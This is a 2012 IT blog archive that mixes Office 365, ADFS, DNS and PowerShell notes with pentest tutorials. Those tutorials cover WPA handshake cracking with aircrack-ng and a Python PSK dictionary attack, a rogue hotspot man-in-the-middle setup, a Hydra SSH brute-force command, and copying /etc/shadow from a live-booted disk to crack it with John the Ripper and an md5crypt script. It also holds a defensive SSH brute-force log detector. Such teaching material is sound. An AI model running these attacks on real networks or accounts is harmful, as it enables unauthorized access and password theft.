Friday, October 5, 2012
Intro To Web Application Pentesting
The OWASP Broken Web Applications Project provides an excellent framework to learn about web application vulnerabilities and to practice penetration testing techniques. It ships as a virtual machine, so everything can be done within a virtual environment, and it is free! You can find more information and download the framework here:
Sunday, September 23, 2012
Office 365 Deployment

Initial Setup
- Add your domain to your account.
  - Go to the Admin page and click Domains under the Management heading.
  - Verify your domain via a TXT record in your authoritative DNS zone. See the online instructions for your particular provider.
  - Define the services you will enroll for Office 365.

Single Sign-On
- Prepare Active Directory
  - If needed, add a UPN suffix that matches your external (verified) domain - http://technet.microsoft.com/en-us/library/cc772007.aspx
  - Set users to default to this new UPN. Federated sign-in uses the UPN, so a private suffix such as .local will not work.
- ADFS 2.0 Deployment
  - For redundancy, consider a federation server farm (WID - Windows Internal Database) with proxies and Network Load Balancing.
    - ADFS servers - domain joined and not a DC
    - ADFS proxies - not domain joined and located in the DMZ (port 443)
  - Configure internal DNS to point to the cluster name.
  - Configure external DNS to point to the NLB for the cluster.
  - Certificates
    - Secure channel (SSL) - from a 3rd party CA
    - Token signing - auto generated; use the self-signed certificate
    - Token decrypting - not used often
  - Install ADFS 2.0
    - Run AdfsSetup.exe
    - After installation completes, open AD FS 2.0 Management and create a new Federation Service. You will need to choose either a stand-alone or a farm deployment. Ensure your SSL certificate matches the Federation Service name, and use the auto-generated certificate for token signing.
    - You can ignore the message asking to add a trusted relying party. This will be done at a later step.
    - Verify the federation server is operational - https://fs.domain.com/FederationMetadata/2007-06/FederationMetadata.xml
    - For more details you can go to the online help here:
  - Install Update Rollup 2 for ADFS 2.0
  - ADFS Proxies
    - Consider deploying two federation server proxies behind a network load balancer to provide fault tolerance.
    - Run AdfsSetup.exe
      - After accepting the license agreement the Server Role page will appear. Select Federation server proxy. A restart may be required.
      - Configure the necessary SSL certificate (3rd party).
      - Enter a Federation Service name that matches your certificate. I used sts.domain.com.
      - Enter credentials with the required permissions to authorize a federation server proxy.
      - Review the settings, then click Next and Close.
      - Verify that the proxy is operational: check the Application event log for AD FS 2.0 event ID 198.

Microsoft Online Services Module for PowerShell
- Download and install the Microsoft Online Services Sign-In Assistant version 7.0 or greater
  - http://onlinehelp.microsoft.com/office365-enterprises/hh124998.aspx
- Download the Microsoft Online Services Module
  - http://onlinehelp.microsoft.com/office365-enterprises/hh124998.aspx
- Import the module
  - PS C:\> Import-Module MSOnline
- Connect to Microsoft Online Services
  - PS C:\> $cred = Get-Credential
  - PS C:\> Connect-MsolService -Credential $cred
- List the cmdlets
  - PS C:\> Get-Command -Module MSOnline

Connecting to Microsoft Office 365 (Exchange Online) with PowerShell
$cred = Get-Credential
$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri https://ps.outlook.com/powershell/ -Credential $cred -Authentication Basic -AllowRedirection
Import-PSSession $Session
When you are finished, run Remove-PSSession $Session so the remote session is released rather than left open until it times out.

Directory Synchronization
- Use the Microsoft Office 365 Deployment Readiness Tool to check for compatibility.
- Do not install the Directory Synchronization tool on a DC. It can be combined with AD FS.
- Activate directory synchronization
  - In your portal, click Admin, then Users. At the top of the page, next to Active Directory synchronization, click Set up and manage Active Directory synchronization, then Activate.
  - Install the Directory Synchronization tool - not on a domain controller
    - Download and install the DirSync tool for your OS
      - Enterprise Admin permissions are required and a new service account will be created - MSOL_AD_SYNC
      - Once installed, you can manually force a synchronization with the Start-OnlineCoexistenceSync cmdlet. Run it from the DirSyncConfigShell.psc1 PowerShell console located under the install directory.

Outlook Anywhere
- Install a valid SSL certificate for Exchange which includes your autodiscover host name.
- Install the RPC over HTTP Proxy component.
- Wait 15 minutes or reboot the server.
- Enable Outlook Anywhere on your Exchange 2007 server.
- Wait 15 minutes or reboot the server.
- If running Windows 2008, you may need to edit your hosts file to include:
  - Internal IP and hostname - 192.168.1.10 exchange
  - Internal IP and internal FQDN - 192.168.1.10 exchange.domain.local
- Configure your public autodiscover DNS record to point to your DMZ IP address.
- Configure your firewall to allow external access on port 443 to your server.

Hostnames/Certificates/Ports

Accessible Server | Hostname                | Certificate           | Ports
------------------|-------------------------|-----------------------|-------
AD FS Server      | fs.domain.com           | Auto/3rd party SSL    | 443
AD FS Proxy       | sts.domain.com          | 3rd party SSL         | 443
Exchange          | mail.domain.com         | 3rd party UC/SAN SSL  | 25/443
                  | webmail.domain.com      |                       |
                  | autodiscover.domain.com |                       |
Monday, September 17, 2012
Hacking WPA
WPA/WPA2 in pre-shared key (personal) mode is susceptible to dictionary-based attacks. The best way to protect against this type of attack is to use a long, complex passphrase to create the Pre-Shared Key (PSK) and to change it regularly.
WPA creates a per-session key called the Pairwise Transient Key (PTK). This key is derived from the PSK together with parameters that are exchanged in the clear during the 4-way handshake: the ANonce, the SNonce, the AP MAC, and the client MAC. The only input not easily available to an attacker is the PSK. The PSK itself is created from the passphrase and the SSID, which are passed through the Password Based Key Derivation Function (PBKDF2, using HMAC-SHA1 with 4096 iterations). The output is a 256-bit shared key.
An attacker uses a dictionary attack: each candidate passphrase is run through PBKDF2 to produce a candidate 256-bit PSK, which combined with the other parameters produces a candidate PTK. The first 128 bits of the PTK (the key confirmation key) are used to recompute the Message Integrity Check (MIC) of one of the handshake packets and compare it with the MIC in the capture. If they match, the passphrase was guessed properly. If not, the process repeats itself throughout the dictionary.
This is for educational purposes only. Do not attempt this on networks without explicit permission. The steps below illustrate the process:
- airodump-ng --channel X --write target mon0 (wait for a WPA handshake; the capture is written to target-01.cap)
- aircrack-ng -w dictionary target-01.cap (performs the dictionary attack)
Once you have the key, you can use Wireshark or airdecap-ng to view the decrypted packets.
Many thanks to Vivek Ramachandran of Securitytube for explaining the material!
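The derivation described above, carried out end to end in Python as an added example (this is not code from the post or from the aircrack-ng project). The SSID, MAC addresses, nonces and the EAPOL-Key frame are constructed here rather than taken from a capture, and the client's side of the handshake is simulated so that the "captured" message 2 carries a MIC for a known passphrase. It goes slightly beyond the post by handling both Key Descriptor versions (TKIP's HMAC-MD5 MIC and CCMP's truncated HMAC-SHA1 MIC).

```python
import hashlib
import hmac

# Constructed handshake parameters (not from a real capture).
SSID = b"FreeWifi"
AP_MAC = bytes.fromhex("00112233aabb")
CLIENT_MAC = bytes.fromhex("66778899ccdd")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
MIC_OFFSET = 81   # 4-byte EAPOL header + 77 bytes of EAPOL-Key fields before the MIC


def derive_psk(passphrase: str, ssid: bytes) -> bytes:
    """WPA-PSK: PBKDF2-HMAC-SHA1, 4096 iterations, 256-bit output (IEEE 802.11i)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk, ap_mac, client_mac, anonce, snonce, nbytes=48):
    """PTK = PRF(PMK, "Pairwise key expansion", min/max of MACs || min/max of nonces).
    The first 16 bytes are the KCK, the key that authenticates the handshake MIC."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, nbytes)


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """MIC over the whole EAPOL-Key frame with its MIC field zeroed. Key Descriptor
    Version 1 (TKIP) uses HMAC-MD5; version 2 (CCMP/AES) uses HMAC-SHA1 truncated to 128 bits."""
    blank = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    version = frame[6] & 0x07     # low 3 bits of the Key Information field
    if version == 1:
        return hmac.new(kck, blank, hashlib.md5).digest()
    return hmac.new(kck, blank, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, version: int = 2) -> bytes:
    """Minimal EAPOL-Key message 2 of the 4-way handshake, MIC field zeroed, no key data."""
    key_info = (0x0100 | 0x0008 | version).to_bytes(2, "big")   # MIC | Pairwise | version
    body = (b"\x02" + key_info + b"\x00\x10" + (1).to_bytes(8, "big") + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


def capture_handshake(passphrase: str, version: int = 2) -> bytes:
    """Play the client: emit message 2 with a valid MIC for the given passphrase.
    This stands in for the frame airodump-ng would record."""
    kck = derive_ptk(derive_psk(passphrase, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    frame = build_msg2(SNONCE, version)
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def dictionary_attack(msg2: bytes, ssid, ap_mac, client_mac, anonce, snonce, wordlist):
    """What aircrack-ng does per candidate: PBKDF2 -> PTK -> KCK -> recompute MIC -> compare."""
    target = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for word in wordlist:
        kck = derive_ptk(derive_psk(word, ssid), ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), target):
            return word
    return None


if __name__ == "__main__":
    msg2 = capture_handshake("password123")
    words = ["letmein", "Password1", "password123", "trustno1"]
    print(dictionary_attack(msg2, SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE, words))
```

The cost of each guess is dominated by the 4096 PBKDF2 iterations, which is why a long random passphrase (not a dictionary word with a digit appended) is the real defence; everything else the attacker needs is in the captured handshake.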
Wednesday, September 12, 2012
Converting Primary Zones to AD Integrated Zones
The process of converting your primary DNS zones to AD-integrated zones is relatively simple: in the zone properties, select the check box to store the zone in Active Directory. There are a few things to consider when making this change.
- The DNS server must also be a domain controller.
- Only primary zones can be stored in AD.
- Secondary zones installed on other domain controllers will be converted when the primary zone is changed. This process will occur once AD DS has been restarted.
- In large environments, this process can take time.
- Once the conversion is complete, review the DNS logs and verify the zones are functioning properly.
Monday, September 3, 2012
Who's in the middle
When you're at your local coffee shop or joining that "Free Wifi" hotspot, you might want to think twice! Anything you send and receive can be "sniffed" without you knowing. I will demonstrate how easy it is to perform a Man in the Middle (MitM) attack. I will set up a "Free Wifi" hotspot and have my test machine connect for some "Free" browsing! You'll need a wireless card that supports packet injection. The Alfa AWUS036H is a great model and well supported by BackTrack.
*******************************************************************************
DISCLAIMER - This is only for educational purposes to help make you aware of the risks with wireless.
*******************************************************************************
The first step is to ensure your interfaces are up.
Next you'll need to put your card in monitor mode. Additional commands may be needed to resolve warning messages.
Now let's set the channel for our wireless card and the monitor interface.
It is now time to create our "Free Wifi" hotspot. This command will remain running during the test. You will see when "clients" connect.
A new interface (at0) will be created and will need to be brought up. We will use brctl to create a bridge so that our "clients" can reach the internet through eth0.
Next we'll need to assign IP addresses to the interfaces and bring up the bridge.
At this point all client traffic is routed through the attacker's machine. Tools such as Wireshark, urlsnarf, driftnet, or webspy could be used to monitor "client" traffic.
If you use public wifi, keep these things in mind. Using a VPN is a good idea, since it keeps even plaintext protocols out of reach of whoever runs the hotspot.
Friday, August 10, 2012
Modifying Custom AD Attributes w/Powershell
Recently I needed to create a custom user attribute within our Active Directory environment. Rather than manually edit each user with the new value, I thought of using PowerShell to automate the process. I began testing using Set-ADUser. Generally you'd find the associated property and add the value:
Set-ADUser username -EmailAddress username@domain.com
The custom attribute I created was EmployeeDOB, so I ran the same command, but the property was not recognized: Set-ADUser only has named parameters for the standard attributes. After some research and help from the TechNet forums, I was introduced to the following options, which work with any attribute defined in the schema:
Set-ADUser username -Add @{EmployeeDOB='5-1-1978'}
Set-ADUser username -Replace @{EmployeeDOB='4-1-1980'}
Set-ADUser username -Remove @{EmployeeDOB='4-1-1980'}
-Add appends a value to the attribute, -Replace overwrites whatever is there, and -Remove deletes only the value you specify. With this new knowledge, I can now hopefully save some time by not having to manually edit these values within ADUC!!
Wednesday, August 1, 2012
Brute Force Cracking of SSH
You can use Hydra to attempt a brute force attack against SSH. You'll need a known user account and a comprehensive password file. Root is generally a known account, but some system admins disable it from logging in via SSH (PermitRootLogin no in sshd_config). Be aware that every attempt is logged by sshd, so this is noisy. Once you have the above prerequisites you can run the following command:
hydra -l <user> -P wordlist.txt 192.168.0.5 ssh
Happy Hunting!
Disclaimer - Only test this with systems you own and have permission to test!
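The defender's view of the same attack, as an added example (not from the post): a hydra run like the one above leaves a burst of "Failed password" lines in sshd's log, and the thing to watch for is a burst followed by an "Accepted" from the same source. The log lines below are constructed to look like OpenSSH syslog output; the threshold and window are arbitrary tuning values.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample auth.log lines in OpenSSH syslog format (not a real capture).
# The first seven lines model a hydra run against root that eventually succeeds.
SAMPLE_LOG = """\
Aug  1 10:00:01 host sshd[2001]: Failed password for root from 192.168.0.50 port 51001 ssh2
Aug  1 10:00:02 host sshd[2002]: Failed password for root from 192.168.0.50 port 51002 ssh2
Aug  1 10:00:02 host sshd[2003]: Failed password for invalid user admin from 192.168.0.50 port 51003 ssh2
Aug  1 10:00:03 host sshd[2004]: Failed password for root from 192.168.0.50 port 51004 ssh2
Aug  1 10:00:03 host sshd[2005]: Failed password for root from 192.168.0.50 port 51005 ssh2
Aug  1 10:00:04 host sshd[2006]: Failed password for root from 192.168.0.50 port 51006 ssh2
Aug  1 10:00:05 host sshd[2007]: Accepted password for root from 192.168.0.50 port 51007 ssh2
Aug  1 10:30:00 host sshd[2100]: Failed password for alice from 10.0.0.7 port 40001 ssh2
Aug  1 10:31:00 host sshd[2101]: Accepted publickey for alice from 10.0.0.7 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)


def parse_auth_log(text: str, year: int = 2012) -> list:
    """Return (timestamp, result, user, ip) tuples. Syslog lines carry no year, so it is supplied."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["ip"]))
    return events


def detect_bruteforce(events: list, threshold: int = 5, window_seconds: int = 60) -> dict:
    """Flag a source IP when it has >= threshold failed logins inside any
    window_seconds span, and record whether a login from it succeeded afterwards."""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev[3]].append(ev)
    alerts = {}
    for ip, evs in by_ip.items():
        evs.sort()
        fails = [e[0] for e in evs if e[1] == "Failed"]
        burst_at = None
        start = 0
        for end in range(len(fails)):            # sliding window over failure times
            while (fails[end] - fails[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                burst_at = fails[start]
                break
        if burst_at is None:
            continue
        alerts[ip] = {
            "failures": len(fails),
            "users": sorted({e[2] for e in evs if e[1] == "Failed"}),
            "success_after_burst": any(e[1] == "Accepted" and e[0] >= burst_at for e in evs),
        }
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(parse_auth_log(SAMPLE_LOG)).items():
        print(ip, info)
```

A single failure from alice is normal and is not flagged; the six failures in four seconds from 192.168.0.50 are, and the success that follows them is the line that should page someone.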
Monday, July 9, 2012
Cracking your shadow!
If you really need to know the password for one of your Linux accounts, you can use some creative means to capture the necessary files and John the Ripper.
As long as the system is not using full disk encryption, you can boot it from BackTrack 5 R2. Once BackTrack is up, mount the system's root partition (read-only is enough) and copy its passwd and shadow files into a working directory. The copies must come from the mounted disk, not from BackTrack's own /etc:
mkdir /root/crack
mount -o ro /dev/sda1 /mnt
cp /mnt/etc/passwd /mnt/etc/shadow /root/crack/
Once you have the files copied to your working directory you can use John the Ripper to crack the passwords. BackTrack 5 R2 comes with a decent password dictionary for starters. You will need to join the passwd and shadow files with unshadow before you can run JtR. You'll need to be in the working directory of JtR or use the full path.
./unshadow /root/crack/passwd /root/crack/shadow > /root/crack/linux_hashes.txt
./john /root/crack/linux_hashes.txt
The cracking process will take time depending on a number of factors: the complexity of the passwords, the quality of your wordlist, and the speed of your hardware. Note that even with these simple passwords it took over 5 minutes to crack all three. Your results may look similar to the output below:
root@root:~# /pentest/passwords/john/john ./linux_hash.txt
Loaded 3 password hashes with 3 different salts (generic crypt(3) [?/32])
evil             (hacker)
guesses: 1  time: 0:00:01:14 31.33% (1) (ETA: Mon Jul  9 17:01:11 2012)  c/s: 48.82  trying: tkirk - 7jkirk
password         (joe)
red              (jim)
guesses: 3  time: 0:00:05:50 DONE (Mon Jul  9 17:03:05 2012)  c/s: 50.07  trying: ncc1701d - 1022
Use the "--show" option to display all of the cracked passwords reliably
root@root:~#
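What unshadow and john are doing under the hood, as an added example (not code from the post or from John the Ripper): the passwd/shadow join, and a dictionary attack against crypt(3) hashes of the $1$ (md5crypt) type, which is the scheme implemented below. The passwd and shadow contents are constructed here, with the hashes generated by the same md5crypt function; the user names and passwords mirror the john output above. Hashes of other types ($5$, $6$) are recognised and reported as not cracked rather than silently skipped.

```python
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> str:
    """crypt(3)-style base64: 6 bits at a time, least significant first."""
    out = ""
    for _ in range(count):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out


def md5crypt(password: bytes, salt: bytes) -> str:
    """FreeBSD md5crypt ($1$), the crypt(3) scheme behind '$1$salt$hash' shadow entries."""
    magic = b"$1$"
    salt = salt[:8]
    ctx = hashlib.md5(password + magic + salt)
    alt = hashlib.md5(password + salt + password).digest()
    remaining = len(password)
    while remaining > 0:                        # mix in alt once per 16 bytes of password
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    bit = len(password)
    while bit:                                  # one byte per bit of len(password)
        ctx.update(b"\x00" if bit & 1 else password[:1])
        bit >>= 1
    final = ctx.digest()
    for i in range(1000):                       # deliberately slow stretching loop
        c = hashlib.md5(password if i & 1 else final)
        if i % 3:
            c.update(salt)
        if i % 7:
            c.update(password)
        c.update(final if i & 1 else password)
        final = c.digest()
    out = ""
    for a, b, c_ in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        out += _to64((final[a] << 16) | (final[b] << 8) | final[c_], 4)
    out += _to64(final[11], 2)
    return (magic + salt).decode() + "$" + out


def unshadow(passwd_text: str, shadow_text: str) -> list:
    """The join John's unshadow performs: put each user's shadow hash into
    the password field of its passwd line."""
    hashes = {}
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2:
            hashes[fields[0]] = fields[1]
    merged = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7:
            continue
        fields[1] = hashes.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return merged


def crack(merged_lines: list, wordlist: list) -> dict:
    """Dictionary attack over unshadow output. Returns {user: password or None};
    locked accounts ('!', '*') are skipped, an empty field means no password at all."""
    results = {}
    for line in merged_lines:
        user, h = line.split(":")[:2]
        if h == "":
            results[user] = ""
            continue
        if h[0] in "!*":
            continue
        results[user] = None
        if not h.startswith("$1$"):
            continue                            # $5$/$6$ need sha-crypt, not implemented here
        salt = h.split("$")[2].encode()
        for word in wordlist:
            if md5crypt(word.encode(), salt) == h:
                results[user] = word
                break
    return results


# Constructed sample files (hashes generated with md5crypt above, not from a real system).
PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "hacker:x:1000:1000::/home/hacker:/bin/bash\n"
    "joe:x:1001:1001::/home/joe:/bin/bash\n"
    "jim:x:1002:1002::/home/jim:/bin/bash\n"
)
SHADOW = (
    "root:!:15500:0:99999:7:::\n"
    f"hacker:{md5crypt(b'evil', b'Xk3p9Lq2')}:15500:0:99999:7:::\n"
    f"joe:{md5crypt(b'password', b'b7Rt1zQw')}:15500:0:99999:7:::\n"
    f"jim:{md5crypt(b'red', b'Ma8eKn0s')}:15500:0:99999:7:::\n"
)
WORDLIST = ["letmein", "ncc1701d", "red", "evil", "password", "tkirk"]

if __name__ == "__main__":
    for user, pw in crack(unshadow(PASSWD, SHADOW), WORDLIST).items():
        print(f"{pw or '<not found>':16} ({user})")
```

The per-user salt is why john reports "3 different salts": every candidate word has to be hashed once per salt, so the 1000-round loop above runs once for each (word, user) pair rather than once per word.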
Wednesday, June 13, 2012
Connecting to MS Office 365 Via Power Shell
1. Download and install Microsoft Online Services Sign-In Assistant version 7.0 or greater
- http://onlinehelp.microsoft.com/office365-enterprises/hh124998.aspx
2. Download the Microsoft Online Services Module
- http://onlinehelp.microsoft.com/office365-enterprises/hh124998.aspx
3. Import the module
- PS C:\> Import-Module MSOnline
4. Connect to the MS Online Services
- PS C:\> $cred = Get-Credential
  cmdlet Get-Credential at command pipeline position 1
  Supply values for the following parameters:
  Credential
- PS C:\> Connect-MsolService -Credential $cred
5. List the available cmdlets
- PS C:\> Get-Command -Module MSOnline
  CommandType     Name                      Definition
  -----------     ----                      ----------
  Cmdlet          Add-MsolGroupMember       Add-MsolGroupMember
  Cmdlet          Add-MsolRoleMember        Add-MsolRoleMember